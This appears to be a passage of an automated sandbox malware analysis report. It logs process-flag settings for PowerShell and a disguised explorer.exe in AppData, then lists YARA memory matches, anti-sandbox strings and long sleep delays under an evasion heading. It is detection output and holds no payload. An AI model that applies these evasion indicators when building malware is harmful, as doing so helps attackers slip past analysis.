          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1284Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544Thread sleep time: -720000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1484Thread sleep time: -41226s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2452Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 808Thread sleep count: 60 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1256Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056Thread sleep time: -60000s >= -30000s
